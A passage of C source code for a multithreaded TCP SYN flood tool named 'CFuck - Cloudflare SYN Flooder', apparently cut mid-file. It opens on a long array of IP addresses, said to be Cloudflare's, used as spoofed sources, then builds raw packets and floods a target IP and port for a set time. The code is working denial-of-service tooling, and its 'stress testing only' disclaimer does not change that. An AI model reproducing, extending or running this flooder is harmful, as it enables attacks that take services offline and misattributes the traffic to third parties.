2,2890043684,1746836813,2890214567,1746320678,1746674850,1746462828,1745933734,2890315517,1746102994,2728351742,2728307146,3161615667,2728380134,1746551125,1746710714,2890193076,2728295538,1746643579,2890325719,1746449138,1746393512,2372236425,2890095274,1746612553,1746400623,2889947807,1746811986,2728385774,2890248239,1746187503,2890083059,2890035352,1746699997,1746920605,1745988014,1746036466,2890008755,1746178140,2890229921,1745964893,1746056687,1746216503,1746645004,2890390287,1745911918,3161612639,2890090502,2890132984,2889989962,2889936811,1746263359,1746827613,1746180084,1746298398,1746661704,1746535336,1746024889,1745925526,2890075595,1746579434,1746417471,2890144724,1746803613,1746538755,1746426427,1746644651,1746718597,2890366096,2728308556,1745977645,1746244716,3324618867,1746083482,1746456109,1746156651,1746507506,2889921899,2728359524,2890269317,1746747807,1746701985,1745958251,2890072948,1746261710,1746833342,2890343642,1746192218,1745952114,2890352762,1746219756,1746812226,1746836911,1746679910,2890340605,1746530146,2728324504,1745943547,2728283826,1746622289,1746244217,2890135611,2728276168,1822620816,1746812968,1746710465,2890169336,1746575373,2890118558,1746345369,1746308289,1746919858,1746372778,1746542428,1746705753,1745938840,1746622312,1746619868,1746735650,2889998324,1746796636,1746825912,1746320090,2890060432,2889921599,1746064300,2890291643,2890393883,2728306273,1746300392,2889943036,1746549282,1746482088,1746568585,3324639519,1746176081,1746594751,2889918973,1746922397,1746829219,2889972937,2889909962,1746406123,1746668207,2890063113,1746857906,1746594075,1745946301,1746134369,1746011259,2890230412,1746836436,1746741841,1746377772,2890208136,1746914682,1746907726,1745928283,2728314632,1745925200,1746787198,1746641622,1746231201,1745988232,2728364724,1746871263,1746868500,1746520354,1746925754,2728289608,2890018598,2890374839,1822616956,2728356032,2890258990,1746306015,1746284515,3324627096,1746298137,1746419752,1746357507,1746738472,1746434202,2889933688,2890060706,1746219455,1746769101,1746205721,2890310633,1746250528,2728367486,1746515264,2728369032,1746871132,1746016284,1746731915,2889903963,1746744023,2890186123,1746613768,1746797673,1746350660,2890185209,2890099585,2728276482,2889937715,1746801902,2890094253,1746784614,1746582892,1746919702,2889947238,1746190456,1746591545,1746783620,2889915759,1746876500,2890002422,2889897903,1745965205,2728284135,1746488164,1746920866,2728328690,1746223005,1746124840,2890319113,2728343032,1746469000,1746595842,1745939149,2890281110,1745993976,1746243838,2890103286,2890318070,1746316093,2890316501,2890199171,1746687003,1746570541,1746266587,1746919711,1746063737,2890149734,1746033468,2890093477,1746385904,1746345376,1746525289,1746525020,2890378624,1746862111,1745909369,1745900155,2890253491,2890186855,1746287225,1746871869,1746256650,1746859770,1745929266,3320508661,2890149120,2890103992,2890386289,1746414841,2890113544,1746693391,2890356807,1746472075,1746669889,1746241761,2728319744,1746470205,1746197230,2728301574,1746593528,1746548601,1746606302,2889994327,2890236556,1746910660,2890067335,1746471587,1745985357,2890147993,1746777410,2890094394,2728333688,1746207413,1746442130,1745921674,1746404395,2889878531,1745883397,1746684992,1746426319,1746813301,1746323730,1746844302,1745976016,2889943206,1746133348,3324626410,2728378121,1746393780,1746136121,2889978446,1746003165,1746251139,2728352083,1745887841,2728274607,1746533689,1746635936,1746697425,1746418133,1745930941,1746843411,1746800268,2890397396,3193828847,2890312027,1745920204,1746106743,1746580229,1746072852,1746140945,2890250917,1746327679,1822615550,1746330839,3324623231,2890062855,2890075011,1746808983,2890109722,1746432330,3324634134,1746572075,1746766237,1746742506,1746870931,1745915480,1746107493,2889939233,2889991293,2890259010,2890141921,1746538001,2728303067,1746694312,2890268077,2728347636,2890382278,2890187361,1746429833,2889898461,2918528776,1746334204,1746188534,2728293365,2728353535,1746051888,2890030743,1745888460,3324617709,1746209158,2890045016,1746856179,1746224416,2889973452,2889897352,1746627584,1746530620,2372238477,1746693177,1746157709,2728279518,2728293727,1746216615,2889977202,1746091433,1746196209,1746490920,1746431842,1746499088,1746487242,1746836560,2890006054,1746197345,1746870011,1746298880,1746156996,1746840328,1746538863,1746545112,1746006506,1746387217,2890284165,1746012584,1746547776,2890095176,1746742691,1746598199,1746091824,1746113291,1746401366,1746679986,1746128152,2890183004,2728308350,2728342441,1746466054,1746655460,2890252966,1746219888,1746100614,2890347989,2890103870,1746165532,2890182731,2890390547,1746699903,1746133730,2890131395,1745931544,1746364448,2890231236,1746885712,1746209809,1746681104,1746535227,1745986772,1746021893,2890330496,1746257580,1746016495,1746629334,2890100785,2728279880,1746683425,2728286547,2889886913,2890084186,1746493783,3324614049,2728300675,1746273725,2728300334,1746925393,1746489652,1746717958,2890382436,1746657726,1746823148,1746677351,1746188210,2890109187,1746299900,1746346121,1746122377,1746490722,1746542879,1746293487,1746714634,1746068082,1746348313,1746075266,2918528521,1746867938,2890029913,1746782746,2728317554,2728350391,2728341021,1746416347,1745967589,1746561247,1746781993,2890123050,2890283233,1746227424,2372228606,1746579861,1746596248,1746794933,1746284909,2889940410,2728366404,1746215335,1746491749,2890169375,1746330387,2889911077,1746156108,1746618965,1746378133,1746815214,2889900099,1746741339,1745903719,1746581451,2889883583,1746520987,1746252537,2728269523,2890371638,1746830816,1746218673,1746595614,2728315672,1746676225,2890107743,1745917856,2889902212,2890067635,3324621616,2889958238,1746845442,1746925423,1746676886,1746849444,2890323600,3324623381,1746775124,2889958010,1729492304,1746333074,2890093931,1746072355,2890125182,1746323747,1746526065,2890141108,1746192704,2890260192,1746635020,2890082998,1746325781,2889999222,1746624157,1746133032,2890044821,1746693463,1746856128,1746299655,1746078044,1746372733,2889941761,2890273506,1746214845,1746737400,2728381986,2890025313,1746315123,2728313190,2890228172,1746411802,1746356074,1746369874,2890136507,2889993613,2890239981,1746398530,1746666879,2889958992,1746571333,1746005757,3193829411,3324634876,1745962375,1746854199,2890364516,1746140736,1746035666,1746772948,1746727037,2889994193,1746862756,1745894098,2890375084,1745926844,3324614654,1746877845,1746088611,1746628727,1746682102,2890173149,1745965524,1746503445,1746710314,2890340120,2890248710,1746441603,1746455038,1746688088,2890093117,3324640645,1746375723,1745955998,1746135749,1746106183,1746764013,1746813208,1746586155,1746913817,1746868071,1746372500,2890090836,1746180244,1746161126,2728348461,1746805432,1746860916,1746309670,1745983250,2890155106,1746252460,1746113826,1746049280,1746306089,1745967561,1746382098,2890055243,2890134199,1746812137,2890199763,1746265985,1746416249,2918530198,1746295048,1746207951,2889956524,1746774028,1746201491,1745993759,2890348549,1746298348,2890182373,2890229462,1746368815,2889901126,1746647126,2890310576,2728365738,1746121690,1746681904,1746654233,1746090767,1746405662,1746561077,1746338223,2890242470,3193827435,1746922943,1746789666,2889954853,1746510624,1746691933,1746082751,2890294928,2889938281,1745887771,2890101377,1746865321,1746616810,1746138807,2890046515,2890148671,1746670207,1746613842,2890107851,1745955783,1746093760,2728290733,2890106435,1746644436,2890262820,1746315861,2890338138,1746614638,1746331928,2890123857,1746078081,2889971444,1746030128,2728313518,1746583659,1746087109,2890117894,2890298168,1746112523,1746349479,1746446365,2889892013,3324622725,2889943271,1746404279,2728295787,2890257487,1746344522,1746384930,2890371047,2889982389,3324622525,1746611980,2890266153,1822617989,2890109544,2890212243,1746342889,2728293185,2889933884,1746015527,2890126996,2728339686,2890285329,1746521277,1745929041,2890030254,1746570817,2728394072,2890142197,2890094323,2890185546,1746044150,1746354563,1745884927,2890010366,1822606445,2890291138,1746442687,1822621516,1745884978,1746317154,1746217483,2890216761,1746862160,1746235246,1746673075,2890066603,1746251610,2889899713,1746281318,2890155363,1745924233,1746786419,1746628833,1746005450,2890156788,2728377532,2890132823,2728317338,2889945654,2890099278,1746316112,1746120996,1746013372,2890395667,1746285044,2890093884,3324627834,1746265422,1746778869,1746455309,1746846944,1746429130,1746789103,1746765034,1746123620,1746927452,2728282107,2728384089,1746012383,1746320723,2728350483,2889886641,1746595369,1745997811,1746436378,1745922609,2890380054,2890273797,1745987424,2728278717,1746651051,2890101511,2728387159,1746857514,1746893598,1746694077,2728285384,1746163926,1746887764,2889972603,1746288255,1746060218,2890199072,2889996333,2728351951,2890102381,1746680031,1746533651,2890199151,2890209706,1746200844,2890098937,1746361647,1746053059,1746535799,1746578375,1746329102,1746884374,2890246280,2890302739,1746719416,1746331995,1746639623,2890391146,2890213701,1746565506,1746902484,1746823876,1729492990,1746411709,2890152925,1746315134,1746229395,2890107398,3161613698,1746444178,1745948920,1746107873,1746707612,2728319652,2728358987,2890071331,1746673648,2890371426,2889990679,2889955460,1746532729,2728372788,2890144064,2889961384,1746615440,1745896980,1746051846,1746700008,2728314496,1746516863,1746820872,1746559529,1746341233,1746416024,3324631794,2890393487,1746916871,1746362587,2890202769,1746441634,1746025091,1746012081,1746735762,2890073035,3324635005,1746906800,1822613263,1746310670,1746384077,1746906425,2890378511,2889914891,2728301288,1746831368,1746894873,2890181119,1746453968,1746274275,1746352517,1746301248,1746245449,1746636866,1745885837,2889999878,1746092990,1746264846,1746011752,1746789429,2889914586,2889918882,2890350630,1746059094,1746373303,1746805178,2890367953,1746631116,3324613492,2890036225,1745971932,1746381766,1746235608,1822609573,2890211777,1746426633,2890118563,2890350278,1746220620,2890163154,2890369332,1746395528,1746283936,2889928694,1746333434,2890239104,1746304491,1746692333,3324627450,2372237571,1746771922,2890117890,2890315064,2890162500,2889919230,1746317462,1746531954,2890039696,2728268195,1746165419,2890205767,2890374708,1746705267,2728323772,1746762734,1746236645,2889918698,2890010124,1746758139,1746114893,1746855985,2890035506,2890304872,1745955178,1746461153,1746615312,1746633066,1746329375,1746308167,1746625556,1746351997,1746282322,1745895826,2890152568,1746534340,1746460223,1746450348,2890259910,1746617174,1746546840,1746550976,1746096430,2890220765,1746047651,1746624128,2890369668,1746378514,1746197944,1746839165,1745990812,1746322406,1745885974,3193830011,1746095826,1746557013,1746382011,2890156740,2890027332,1746625290,1746554312,1746521833,1746258415,2890034302,2890181209,2890293638,2890369245,2890340456,2889971297,2890323047,1746363370,1746235144,1746419581,1746900221,3324638896,1746549009,1746595098,1746676689,2890356553,2728322197,1745927764,1746222075,1745991768,2890309443,1746271590,1745907714,1745980438,2890080526,1746110562,1745911464,2728303657,1746794030,1746494170,2890242523,1746573843,2890190001,2890160100,1746792377,1745933039,2889990278,2728277684,1746887912,2890339154,3324620780,2890285940,1746522398,1746903314,1746841081,2890065614,1746371986,1746789628,1746426106,1746588942,1746525469,2890205978,1746565190,3324641219,1746290798,1746735806,1746401310,2890355779,2889998692,1746696938,1746092593,1746506120,2889976598,2890042440,1746747919,1746596627,1746546936,2890214886,1746212947,1746765375,2728331272,1746059983,2728357161,2889974081,2890051291,1746178013,1746836905,1746662663,1746915075,1746556597,2890198060,1746044417,2728310539,1746902846,1746587140,2890089893,1746532696,1746660029,1746196815,1746395366,1746670358,2889991000,1746649520,2890068792,3324614468,2890240306,1746326187,2890221318,1746831936,1746092319,2890257778,1746886015,2890109270,2889929863,1746684408,1746812919,2889997974,2889994573,1746117835,1746107637,1746681116,2890031881,1746281361,2728336265,1746045059,1746364130,2728365107,1745998659,1746291105,1746352332,2890188662,1746896273,1746160766,1746764980,1745995274,2728279934,2728346563,2890206129,2889970490,2889972309,1746349027,1746629389,1746169252,1746285089,2890027400,2372224899,2890159093,2890244801,1746716657,1745974360,1746483557,1745899112,1746319207,2890005725,2890243396,1746847960,1746381339,1746625008,2728358297,2890105618,2890100129,1746723715,1746357715,2889932325,1746259802,1746209307,2372228646,1746078118,2890293168,2889990846,2728330387,1746768449,2889902930,2728277434,2890297656,1746578677,2890001070,1746403589,1746229371,1746782536,2890342692,1746753903,2890101653,2728363740,1746810188,1746447329,2890360780,1746592846,1746583979,1746821077,1746407735,2890124135,2728293916,1746788332,1746301645,2372234701,1746481802,1746878792,1746428008,1746375805,2728300822,1746041803,1746397173};
	int ipspoof= htonl(class[rand_cmwc()%4095]);
	
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->id = htons(rand() % (65535 + 1 - 0) + 0);
    iph->frag_off = htons(IP_DF);
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0; 
	iph->saddr = ipspoof;
    iph->daddr = sin.sin_addr.s_addr;
	iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
	
    iph->check = csum ((unsigned short *) packet, iph->tot_len >> 1);
 
    tcph->source = htons(rand()%25530+30000);
    tcph->dest = htons(atoi(argv[2]));
    tcph->seq = htons(rand() % (4294967296 + 1 - 0) + 0);
    tcph->ack_seq = 0;
    tcph->doff = 5;
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = 65535;
    tcph->check = 0;
    tcph->urg_ptr = 0;
 
    psh.source_address = ipspoof;
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);
 
    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
 
    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
 
	int one = 1;
	const int *val = &one;
	int sockop = setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)); 
	if (sockop < 0)
	{
		printf ("[ERROR] are you root?\n", errno);
		exit(-1);
	}
 
	sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin));
 
	close(s);
    return 0;
}

void *thread_attack(void *thread_params)
{
	struct pthread_param *params = thread_params;
	while (1)
		attack(params->argc, params->argv);
}
 
int main (int argc, char *argv[])
{
	int i;

	srand(time(0));
	
	if (argc != 5)
	{
		printf("CFuck - Cloudflare SYN Flooder V1.2\n");
		printf("Hit servers from 10k different Cloudflare IPs :)\n");
		printf("Made by JiiN - Private for Cyber-Hub.pw\n\n");
		printf(" ============================================================================\n");
		printf(" >> For network stress testing only! <<\n");
		printf(" >> Users are legally responsible for the illegal usage of this tool <<\n");
		printf(" ============================================================================\n");
		printf("Usage: %s <destip> <destport> <threads> <time in seconds> \n", argv[0]);
		exit(-1);
		return -1;
	}
	
	int num_threads = atoi(argv[3]);
	
	pthread_t ssyn_attack[num_threads];
	
	struct pthread_param params;
	params.argc = argc;
	params.argv = argv;
	
	for (i = 0; i < num_threads; i++)
		pthread_create( &ssyn_attack[i], NULL, thread_attack, (void*) &params);
	
	
	printf("[!] Attacking...\n");
	sleep(atoi(argv[4]));
	
	return 0;

}